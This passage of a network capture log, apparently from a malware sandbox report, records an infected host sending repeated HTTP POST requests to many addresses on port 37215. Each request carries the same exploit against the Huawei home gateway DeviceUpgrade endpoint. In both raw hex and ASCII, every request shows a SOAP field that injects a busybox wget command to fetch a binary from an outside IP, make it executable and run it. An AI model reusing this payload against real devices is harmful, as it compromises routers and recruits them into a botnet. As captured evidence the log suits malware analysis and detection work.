                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            522192.168.2.156077241.139.154.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787641048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            523192.168.2.154133641.138.36.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787678003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            524192.168.2.153371041.54.173.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787689924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            525192.168.2.155468441.75.38.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787719011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            526192.168.2.155467041.80.184.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787741899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            527192.168.2.154403441.195.9.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787769079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            528192.168.2.154330441.230.12.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787791967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            529192.168.2.153968041.131.126.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787847042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            530192.168.2.154791241.221.131.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787853956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            531192.168.2.153819841.147.199.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787864923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
